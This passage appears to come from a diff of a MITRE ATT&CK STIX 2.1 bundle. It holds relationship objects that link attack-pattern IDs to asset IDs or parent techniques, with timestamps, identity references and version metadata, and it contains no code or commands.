"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:51:27.775Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0cab3d16-295d-46b7-b7f9-4d1ddd44d450", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0ccc8293-d622-405e-9975-bbd324679c8b", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0ce12f1a-d1cd-4044-bb8e-5907abddc7a3", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0d04a0c6-0fb1-4184-9ff8-f1e3f2fba476", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0d06a9f1-fc35-4f35-a628-3515b0686747", + "created": "2020-01-31T12:42:44.324Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0d2d9b59-a152-4280-ac57-ce5416cbbe61", + "created": "2020-02-11T18:40:00.043Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0d52eea3-394e-492b-944b-9ccb6348329d", + "created": "2023-09-28T21:14:41.633Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:14:41.633Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0d5b25a9-3356-48c1-901c-4e2fe459e586", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0d65606b-4727-4680-8b7c-0bf9597e5509", + "created": "2024-06-27T09:37:56.028Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:37:56.028Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0d8e0324-ba8e-4712-a123-60377afe94da", + "created": "2023-09-29T18:48:17.073Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:48:17.073Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0d9e9afe-c7f2-4bca-b10c-7380e3b9af1d", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0da1e755-39f2-43d9-9dc3-26105182209e", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0db3368a-15fb-4936-9f6a-fb6fb4ac6e07", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0dbf48f3-4579-4ca2-aceb-19d3e0449136", + "created": "2023-09-29T17:57:12.010Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:57:12.010Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0dbf83d9-2203-4b2a-bcb6-3f5d7b52fcdf", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0dc43045-9c76-4441-b2e3-f038aac08713", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0dc6e1d3-3490-4f5d-b56e-d81a417f91bc", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0dd4b4d7-2f76-4d88-a914-4982696ade4e", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0e099afb-f76c-44fd-94f7-f6c468a81602", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0e191d66-fe38-4f28-ad82-6922bd6bcc81", + "created": "2024-04-09T20:58:17.933Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:58:17.933Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0e263b73-a033-4fac-9d6d-076ab8f8b954", + "created": "2023-09-29T16:27:50.949Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:27:50.949Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0e4407b6-fa67-48a7-97c5-f0bff5112912", + "created": "2020-03-20T19:53:25.794Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d", + "target_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0e59deff-2409-4314-93f7-d451a40d7c6f", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0e659dca-df0b-41ba-a293-490727f18c0e", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0e7f1425-5d48-4587-837c-fe43fd14e49f", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0e9dd235-8762-438d-be0e-ac4b7199d633", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0ea6c4e4-fedd-4fd9-a5fc-c07e3fb0f2a5", + "created": "2020-10-02T14:57:16.081Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156", + "target_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0eb0f3d6-87c0-4615-a200-bea4be1ac32a", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0ec0af54-0182-4ad4-9b0e-4542a822de7f", + "created": "2022-09-30T18:50:14.500Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T18:50:14.500Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0ec34acf-934f-41a0-8f93-6012f3ac14ca", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0eed163b-c106-4f91-9fee-65b2684d0ab6", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0ef1e408-8ebb-4b28-b619-02914b7bae29", + "created": "2023-09-29T17:57:34.378Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:57:34.378Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f057592-54cb-4e99-9369-55ea6ba0e5e6", + "created": "2024-05-22T13:01:50.268Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T15:10:30.054Z", + "description": "Asset Mapping Rationale: Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f2d1c8b-4fb7-41e7-8def-36123060e5ae", + "created": "2020-03-14T23:29:54.243Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--1ce03c65-5946-4ac9-9d4d-66db87e024bd", + "target_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f30057f-289b-49b2-b31f-d430195e80a1", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f440a2e-dbea-46ff-8fbd-a73755ee22a8", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f44c2c0-39d7-4d62-8903-571e9128e57e", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f50010e-7c6a-407c-a75b-4ca8e366385e", + "created": 